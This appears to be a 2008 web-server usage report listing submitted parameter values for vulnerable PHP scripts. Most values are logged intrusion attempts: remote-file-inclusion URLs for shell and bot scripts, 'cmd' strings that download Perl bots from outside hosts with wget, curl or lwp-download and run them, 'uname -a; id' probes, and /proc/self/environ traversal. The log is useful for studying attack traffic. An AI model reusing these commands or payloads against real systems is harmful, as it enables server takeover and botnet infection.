cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt; fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf *.txt	8
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/ pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t xt;perl pemlk.txt;rm -rf pemlk*.txt	7
uname -a; id	7
Parameter	list
Value	Accesses
1	13
Parameter	mosConfig_absolute_path
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	59
http://www.jolieloves.com/mori/cmd.txt?	47
http://www.jungo8949.co.kr/tool25.txt?	42
http://www.oslutadores.com/?id=23530	36
http://www.freewebs.com/yahwek/sete.txt?	31
http://www.neoncomanda.kit.net/tool25.dat?	30
http://www.freewebs.com/yahwek/phpbot.txt?	30
	28
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	26
http://189.23.251.131/~tiago/new.txt?	26
OTHER:	2,989
Script	Total Accesses
/wusage/summary/cgi.html/modules/AllMyGuests/signin.php	3,452
Parameters by Submitted Value
Parameter	_AMGconfig[cfg_serverpath]
Value	Accesses
http://c4sh1234.100free.com/sc.gif?	52
http://ownsirc.googlepages.com/botnet.txt?	47
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima ges/.asc/www?????????????????????????????	39
http://www.freewebs.com/yahwek/sete.txt?	35
http://www.oslutadores.com/?id=23530	34
http://www.jungo8949.co.kr/tool25.txt?	34
http://www.bergenfest.no/vnc/cmd.txt?	32
http://h1.ripway.com/tsk4/cmd.txt?	32
http://www.freewebs.com/yahwek/phpbot.txt?	25
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	24
Parameter	_AMGconfig[cfg_serverpats/tinycontent/admin/spaw/spaw_contro l.class.php?spaw_root
Value	Accesses
http://www.digownz.kit.net/pbot1.txt??	9
http://www.freewebs.com/t420/p.txt??	6
http://www.rj2009.kit.net/ddd.txt?	6
http://www.rj2008.kit.net/p.txt??	6
http://www.freewebs.com/h1h1h1/p.txt??	6
http://www.freewebs.com/playssonn/p.txt??	5
http://www.digownz.kit.net/pbot1.txt?	4
http://www.freewebs.com/b0mb4do1337/p.txt??	4
http://flaw.we.bs/a.txt?	3
http://www.rj2009.kit.net/p.txt?	2
Parameter	_AMGconfigcfg_serverpath]
Value	Accesses
http://h1.ripway.com/tsk4/cmd.txt?	31
http://h1.ripway.com/tsk7/cmd.txt?	11
http://h1.ripway.com/tsk4/botlogin.txt?	6
http://www.019online.com/components/com_rwcards/images/cmd.t xt?	5
http://h1.ripway.com/tsk4/TESTE.txt?	4
http://www.miskolctapolca.hu/hirdetesek/IND.jpg?	3
http://h1.ripway.com/tsk7/botINDO.txt?	3
http://www.auzr.kz/tender/files/cmd.txt?	3
http://www.auzr.kz/tender/files/cmd.jpg?	3
http://h1.ripway.com/tsk7/botIND.txt?	2
Parameter	caminho
Value	Accesses
marajoara	1
Parameter	chdir
Value	Accesses
	1
Parameter	cmd
Value	Accesses
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per l botx2.txt;rm -rf txt	27
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	17
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2. txt;rm -rf txt	15
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p erl botx2.txt;rm -rf txt	14
uname -a; id	12
cd /tmp;lwp-download http://www.019online.com/components/com _rwcards/images/IND2.jpg;curl -O http://www.019online.com/co mponents/com_rwcards/images/IND2.jpg;wget http://www.019onli ne.com/components/com_rwcards/images/IND2.jpg;perl IND2.jpg; rm -rf IND	11
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3. ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt	11
cd /tmp;lwp-download http://h1.ripway.com/tsk7/botx2.txt;per l botx2.txt;rm -rf txt	9
cd /tmp;curl -O http://h1.ripway.com/tsk7/botx2.txt;perl bot x2.txt;rm -rf txt	8
cd /tmp;wget http://h1.ripway.com/cmdtsk/botx2.txt;perl botx 2.txt;rm -rf txt	8
Parameter	list
Value	Accesses
1	19
OTHER:	2,823
Script	Total Accesses
/wusage/summary/cgi.html//index.php	3,235
Parameters by Submitted Value
Parameter	GLOBALS
Value	Accesses
	36
http://tanbebek.com/pitik/ascid.txt???	1
Parameter	Itemid50
Value	Accesses
	3
Parameter	Itemid
Value	Accesses
	350
26	4
156	2
1	2
191//administrator/configuration.php?option=com_login	2
87	1
87//index.php?option=com_joomlaxplorer	1
149	1
Parameter	_REQUEST
Value	Accesses
	37
Parameter	_REQUEST[Itemid
Value	Accesses
1	2
Parameter	_REQUEST[Itemid]
Value	Accesses
1	35
Parameter	_REQUEST[option]
Value	Accesses
com_content	19
com_phpshop	7
com_rsgallery	4
com_login	3
com_facileforms	2
com_performs	1
com_extcalendar	1
http://sujianto.com/zreg.txt?	1
Parameter	action
Value	Accesses
show_error	11
Parameter	admin_path
Value	Accesses
http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt?	3
Parameter	autoLoadConfig[999][0][autoType]
Value	Accesses
include	43
http://normanzito.iespana.es/http.txt??	6
http://cornuletz.angelfire.com/c99in.txt?	5
http://www.corsemusique.com/portail/agenda/muie.txt?	3
http://www.corsemusique.com/portail/agenda/config/tester.txt ?	3
http://freewebs.com/diegoxfelix/ch.txt?	2
http://mykonos.bargaingreece.com//components/com_log/sefe.tx t?	2
http://www.answergraphics.com/file_upload/modules/public/con fig/tester.txt?	1
http://mail.admnyagan.ru/config/tester.txt?	1
http://www.corsemusique.com/portail/agenda/config/exp667.txt ?	1
OTHER:	2,639
Script	Total Accesses
/wusage/summary/cgi.html/index.php	3,170
Parameters by Submitted Value
Parameter
Value	Accesses
connection:absolute_path=http://invisionar.hostinggratisarge ntina.com/eth0?	15
connection:absolute_path=http://www.santiagoonline.com.ar/ht tp?	9
connection:absolute_path=http://www.santiagoonline.com.ar/re adme.txt?	6
connection:absolute_path=http://usuarios.arnet.com.ar/adrikr asnow/test.txt?	4
connection:absolute_path=http://tckct.co.uk/public_htm/speed .txt?	3
connection:absolute_path=http://www.santiagoonline.com.ar/re adme.txt?http://www.santiagoonline.com.ar/readme.txt?	3
connection:absolute_path=http://geragay.bravehost.com/http?	2
connection:absolute_path=http://arsenicotrolo.webcindario.co m/eth0?	2
http://aguasanas.com/dysloke/bot.txt?	2
connection:absolute_path=http://www.hoopster.1142degrees.com ./articles/te.jpg?	2
Parameter	GLOBALS
Value	Accesses
	140
Parameter	HomeDir
Value	Accesses
http://darkisx.com/plugins/xoops/2fast.txt?	1
Parameter	Itemid
Value	Accesses
	253
1	17
156	4
http://luminaldemon.altervista.org/img/cmd.txt???????????	1
Parameter	RP_PATH
Value	Accesses
http://www.spindl-hotelpraha.cz/system/temp/control.txt?	1
http://www.wisdomofgod.org/backup/m2f/.r/vampire.txt?	1
http://eventtoday.com/bbs/skin/gallery_thum/safe.txt?	1
http://c0cac0larul3z.t35.com/cmd.txt?	1
http://www.mascht.com/picart/mh.txt??	1
http://www.wisdomofgod.org/backup/m2f/.r/vampire.txt???	1
Parameter	_REQUEST
Value	Accesses
	147
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	20
http://normanzito.iespana.es/http.txt??	18
http://usuarios.arnet.com.ar/larry123/ka.txt?	15
http://usuarios.arnet.com.ar/adipasqua/http?	15
http://usuarios.arnet.com.ar/larry123/exploit.txt?	14
http://usuarios.arnet.com.ar/larry123/http?	13
http://dark4ngel.hostinggratisargentina.com/http?	12
http://fxmsn.org/1.txt?	9
http://www.apocalypticduck.com/skins/advanced/config/exp667. txt?	9
Parameter	_REQUEST[Itemid
Value	Accesses
1	4
Parameter	_REQUEST[Itemid]
Value	Accesses
1	136
http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt?	1
Parameter	_REQUEST[option]
Value	Accesses
com_content	70
com_phpshop	32
com_login	9
com_akobook	7
com_rsgallery	5
option,com_extcalendar	4
com_sitemap	3
com_com_akobook	3
com_facileforms	2
com_phshop	2
Parameter	absolute_path
Value	Accesses
http://www.skd.it/vwar/admin/can?	1
OTHER:	2,149
Script	Total Accesses
/wusage/summary/cgi.html/newspublish/include.php	3,026
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
uname -a; id	16
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	10
cd /tmp;rm ng;wget http://ownz-you.com/ng.txt;fetch http:// ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt; curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/ ng.txt;perl ng.txt;rm -rf ng	6
cd /tmp;rm sta.txt;wget http://189.24.20.53/sta.txt;fetch ht tp://189.24.20.53/sta.txt;lwp-download http://189.24.20.53/s ta.txt;curl -O http://189.24.20.53/sta.txt;lynx http://189.2 4.20.53/sta.txt;perl sta.txt;rm sta.txt	6
id	6
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	6
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt ;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl -O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t xt	5
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www1.freewebs.c om/sur00tec/srz.txt;fetch http://www1.freewebs.com/sur00tec/ srz.txt;curl -o http://www1.freewebs.com/sur00tec/srz.txt;wg et http://www1.freewebs.com/sur00tec/srz.txt;perl srz.txt;rm srz.txt	5
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4 /srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt; lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http ://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf srz.txt*	4
cd /tmp;rm sta.txt;wget http://189.24.36.96:9090/sta.txt;fet ch http://189.24.36.96:9090/sta.txt;lwp-download http://189. 24.36.96:9090/sta.txt;curl -O http://189.24.36.96:9090/sta.t xt;lynx http://189.24.36.96:9090/sta.txt;perl sta.txt;rm sta .txt?	4
Parameter	list
Value	Accesses
1	13
Parameter	path[docroot]
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	61
http://www.freewebs.com/sur00tseclan/httd.txt?	43
http://invisionar.hostinggratisargentina.com/eth0?	43
http://216.83.134.89/teste2bot.txt?	41
http://oon.web.id/r57?	39
http://www.oslutadores.com/?id=23530	36
http://www.freewebs.com/yahwek/sete.txt?	32
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	31
	28
http://usuarios.arnet.com.ar/larry123/ka.txt?	28
Parameter	path[docrs-for-live-51-de.html/skins/advanced/advanced1.php? pluginpath[0]
Value	Accesses
http://www.stdr.xpg.com.br/compito?	1
Parameter	xroot
Value	Accesses
www.popcorn.de/cmd?	1
OTHER:	2,561
Script	Total Accesses
/wusage/summary/cgi.html//modules/xgallery/upgrade_album.php	2,999
Parameters by Submitted Value
Parameter	GALLERY_BASEDIR
Value	Accesses
	50
http://invisionar.hostinggratisargentina.com/eth0?	41
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	39
http://joaobenner.googlepages.com/script2.txt??	33
http://ownsirc.googlepages.com/botnet.txt?	27
http://www.lordxpl.xpg.com.br/own.txt??	26
http://yahwek.dll.googlepages.com/phpbot.txt?	23
http://normanzito.iespana.es/http.txt??	21
http://yugifire.t35.com/tool25.txt?	21
http://www.stdr.xpg.com.br/priv8?	20
Parameter	GALLERY_BASEDIRhttp://softhack.bravehost.com/themain.txt?
Value	Accesses
	1
Parameter	cmd
Value	Accesses
	2
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	25
cd /tmp;rm bot1.txt;wget http://yugifire.t35.com/bot1.txt;fe tch http://yugifire.t35.com/bot1.txt;lwp-download http://yug ifire.t35.com/bot1.txt;curl -O http://yugifire.t35.com/bot1. txt;lynx http://yugifire.t35.com/bot1.txt;perl bot1.txt	23
cd /tmp; wget http://intranet.2circolovimercate.it/intro//mo dules/Forums/admin/scan.pl; curl -o scan.pl http://intranet. 2circolovimercate.it/intro//modules/Forums/admin/scan.pl; pe rl scan.pl	10
uname -a; id	10
id	9
cd /tmp;wget http://deltaboogie.com/blog/modules/Forums/admi n/kk.txt;perl kk.txt h4h4	9
cd /tmp;rm -rf ownz;wget http://enigmax1.kit.net/ownz.txt;l wp-download http://enigmax1.kit.net/ownz.txt;fetch http://en igmax1.kit.net/ownz.txt;curl -o ownz.txt http://enigmax1.kit .net/ownz.txt;GET http://enigmax1.kit.net/ownz.txt >ownz.txt ;lynx -source http://enigmax1.kit.net/ownz.txt >ownz.txt;per l ownz.txt;rm -rf ownz.txt	9
cd /tmp;rm -rf bot.txt;wget http://haddem.awardspace.com/bo t.txt.txt;lwp-download http://haddem.awardspace.com/bot.txt; fetch http://haddem.awardspace.com/bot.txt;curl -o bot.txt h ttp://haddem.awardspace.com/bot.txt;GET http://haddem.awards pace.com/bot.txt >bot.txt;lynx -source http://haddem.awardsp ace.com/bot.txt >bot.txt;perl bot.txt;rm -rf bot.txt	8
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	5
Parameter	list
Value	Accesses
1	4
Parameter	vid
Value	Accesses
41025634	1
OTHER:	2,582
Script	Total Accesses
/wusage/summary/cgi.html/modules/xfsection/modify.php	2,972
Parameters by Submitted Value
Parameter	*
Value	Accesses
http://www.superlab.jazztel.es/safe.gif?	8
http://77.90.4.28/safeon.txt??	1
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	15
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3. ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt	14
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	14
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	12
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	10
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	9
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	9
cd /tmp;killall -9 perl;wget http://72.1.85.234/1.txt;curl - O http://72.1.85.234/1.txt;fetch http://72.1.85.234/1.txt;lw p-download http://72.1.85.234/1.txt;wget http://72.1.85.234/ 2.txt;curl -O http://72.1.85.234/2.txt;fetch http://72.1.85. 234/2.txt;lwp-download http://72.1.85.234/2.txt;wget http:// 72.1.85.234/3.txt;curl -O http://72.1.85.234/3.txt;fetch htt p://72.1.85.234/3.txt;lwp-download http://72.1.85.234/3.txt; wget http://72.1.85.234/4.txt;curl -O http://72.1.85.234/4.t xt;fetch http://72.1.85.234/4.txt;lwp-download http://72.1.8 5.234/4.txt;wget http://72.1.85.234/5.txt;curl -O http://72. 1.85.234/5.txt;fetch http://72.1.85.234/5.txt;lwp-download h ttp://72.1.85.234/5.txt;wget http://72.1.85.234/6.txt;curl - O http://72.1.85.234/6.txt;fetch http://72.1.85.234/6.txt;lw p-download http://72.1.85.234/6.txt;perl 1.txt;perl 2.txt;pe rl 3.txt;perl 4.txt;perl 5.txt;perl 6.txt;rm -rf txt	9
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	8
cd /tmp;rm -rf tut;wget http://inimigo.t35.com/tut.txt;lwp- download http://inimigo.t35.com/tut.txt;fetch http://inimigo .t35.com/tut.txt;curl -o tut.txt http://inimigo.t35.com/tut. txt;GET http://inimigo.t35.com/tut.txt >tut.txt;lynx -source http://inimigo.t35.com/tut.txt >tut.txt;perl tut.txt;rm -rf tut.txt	6
Parameter	dir_moduel
Value	Accesses
http://geocities.com/kiddiesSscript/injex.txt?	1
Parameter	dir_module
Value	Accesses
http://jackzard.110mb.com/r57?	101
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	57
http://ownsirc.googlepages.com/botnet.txt?	48
http://www.oslutadores.com/?id=23530	34
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	32
http://www.freewebs.com/yahwek/sete.txt?	30
http://www.freewebs.com/yahwek/phpbot.txt?	29
http://invisionar.hostinggratisargentina.com/eth0?	28
http://www.jungo8949.co.kr/tool25.txt?	27
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	24
Parameter	dir_modulehttp://www.geocities.com/greencoolest/Eny.txt?
Value	Accesses
	1
Parameter	list
Value	Accesses
1	18
OTHER:	2,427
Script	Total Accesses
/wusage/summary/cgi.html//components/com_rsgallery/rsgallery .html.php	2,871
Parameters by Submitted Value
Parameter
Value	Accesses
http://badmus.by.ru/id.txt?	1
Parameter	?v
Value	Accesses
	1
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	13
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	12
uname -a; id	11
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	11
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	8
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	7
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	7
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3 .ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt	6
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
Parameter	http://www.endro.de/stammbaum/media/thumbs/TumbsInfo.txt?
Value	Accesses
	1
Parameter	list
Value	Accesses
1	1
Parameter	mosC4CMS.php?dir[inc]
Value	Accesses
http://www.ss3s.org/r57.txt?	1
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	53
http://www.jolieloves.com/mori/cmd.txt?	47
http://189.23.251.131/~tiago/new.txt?	43
http://invisionar.hostinggratisargentina.com/eth0?	37
http://www.freewebs.com/yahwek/phpbot.txt?	33
http://usuarios.arnet.com.ar/larry123/safe.txt?	32
http://www.neoncomanda.kit.net/tool25.dat?	30
http://ownsirc.googlepages.com/botnet.txt?	29
http://www.oslutadores.com/?id=23530	28
	24
Parameter	mosConfig_absolute_pathhttp://usuarios.arnet.com.ar/adrikras now/rfi/bla.txt?
Value	Accesses
	2
OTHER:	2,416
Script	Total Accesses
/wusage/summary/cgi.html/modules/tinycontent/admin/spaw/spaw _control.class.php	2,537
Parameters by Submitted Value
Parameter
Value	Accesses
	1
Parameter	cmd
Value	Accesses
uname -a; id	16
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per l botx2.txt;rm -rf txt	14
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	13
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	11
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2. txt;rm -rf txt	7
id	7
cd /tmp;rm ng;wget http://ownz-you.com/ng.txt;fetch http:// ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt; curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/ ng.txt;perl ng.txt;rm -rf ng	6
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	6
cd /tmp;lwp-download http://www.019online.com/components/com _rwcards/images/IND2.jpg;curl -O http://www.019online.com/co mponents/com_rwcards/images/IND2.jpg;wget http://www.019onli ne.com/components/com_rwcards/images/IND2.jpg;perl IND2.jpg; rm -rf IND	5
cd /tmp;lwp-download http://h1.ripway.com/tsk7/botx2.txt;per l botx2.txt;rm -rf txt	5
Parameter	list
Value	Accesses
1	13
Parameter	s
Value	Accesses
r	1
Parameter	spaw_root
Value	Accesses
http://jorgevolio.com/.cookies/safe.gif?	100
http://ownsirc.googlepages.com/botnet.txt?	34
http://h1.ripway.com/tsk4/cmd.txt?	31
http://invisionar.hostinggratisargentina.com/eth0?	27
http://www.freewebs.com/yahwek/sete.txt?	26
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	26
http://www.oslutadores.com/?id=23530	25
http://www.freewebs.com/yahwek/phpbot.txt?	20
http://usuarios.arnet.com.ar/larry123/safe.txt?	20
http://www.superlab.jazztel.es/safe.gif?	18
Parameter	xroot
Value	Accesses
www.popcorn.de/cmd?	1
OTHER:	2,104
Script	Total Accesses
/wusage//	2,532
Parameters by Submitted Value
Parameter	APB_rp
Value	Accesses
http://www.haruuu.com/albanianid.txt?????	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	4
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.kq-china.com/web//plugins/system/id1.txt???	3
http://www.allforweb.co.kr/data/lang/fatal1.txt??	2
http://www.lazar.ru/manager/processors/min.txt?	2
http://www.allforweb.co.kr/data/lang/fatal1.txt?	1
Parameter	GALLERY_BASEDIR
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	2
Parameter	GLOBALS
Value	Accesses
	7
Parameter	INCLUDE_FOLDER
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	2
http://tstk.org//ktmllite/images/upload/sh1.txt????	1
http://zonadeclientes.com/id1.txt??	1
http://pallmall5.fileave.com/id.txt??	1
http://www.hitler.h17.ru//gallery/1.gif??	1
http://www.geocities.com/jembutzmu/31377os.txt?	1
http://www.sunggong.tv/data/shirohige/fxid.txt??	1
http://plengeh.co.cc/scripts/id1.txt???	1
http://gumansin.com/id.txt??	1
http://brandon420.xpg.com.br/bots/id.txt??	1
Parameter	REX[INCLUDE_PATH]
Value	Accesses
http://pediatric-neurology-paris.net/media/install_41aca995b 9171/patch/includes/vsc/botid.txt?	4
Parameter	_REQUEST
Value	Accesses
	7
Parameter	_REQUEST[Itemid]
Value	Accesses
1	7
Parameter	_REQUEST[option]
Value	Accesses
com_content	7
OTHER:	2,474
Script	Total Accesses
/wusage/weekly/2008/09/07/	2,433
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
	2
Parameter	_zb_path
Value	Accesses
http://www.aerothaiunion.com/sik.txt?	7
http://maehongson.nfe.go.th/budget3/image/id.jpg???	4
http://51ucn.com/xjarea/shz/help01.txt?????	4
http://www.mfa.gov.bt/kethek-id.txt???	3
../../../../../../../../../../../../../../../../../../../../ ../../../../proc/self/environ	2
http://www.grig.com/FX29ID.txt??	2
../../../../../../../../../../../../../../../../../../../../ ../../../../proc/self/environ	2
http://www.j-vision.co.kr/company/hotel/index.php/bo.do??	2
http://www.2u264.com/bbs//include/id1.txt??	2
http://190.220.29.155/.sys/v6id.txt???	2
Parameter	abs_path
Value	Accesses
http://www.lazar.ru/manager/processors/copyright.txt???	1
Parameter	custompluginfile
Value	Accesses
http://basclan.org/idv6.txt?????	1
http://huhta-tv.org/idv6.txt????	1
http://70.47.27.6/~autol/idv6.txt????	1
Parameter	custompluginfile[]
Value	Accesses
http://www.nepspb.com/images/id6.txt????	7
http://www.clansuche24.de/CMD.txt??	4
http://vnc2009.webcindario.com/tst.txt??	4
http://shemouth.nimunet.com/irc/id.txt????	2
http://www.geocities.com/axenses/id.txt???	2
http://www.lazar.ru/manager/processors/copyright.txt???	2
http://www.mfa.gov.bt/kethek-id.txt???	1
http://www.diplom.nu/templates_c/id.txt??	1
http://clubsuscriptores.eltiempo.com/templates_c/id.txt?	1
http://62.94.24.124/cerignola/home/CuteNews/id?	1
Parameter	custompluginfile[]http://gabifir.yourfreehosting.net/2?
Value	Accesses
	1
Parameter	mosConfig_absolute_path
Value	Accesses
http://ambrosiasociety.org/zenphoto/cache/bo.do? ??	1
http://www.mykr.net/bbs/id.txt?	1
http://ambrosiasociety.org/zenphoto/cache/bo.do???	1
http://www.mykr.net/bbs/id.txt??	1
Parameter	mosConfig_admin_path
Value	Accesses
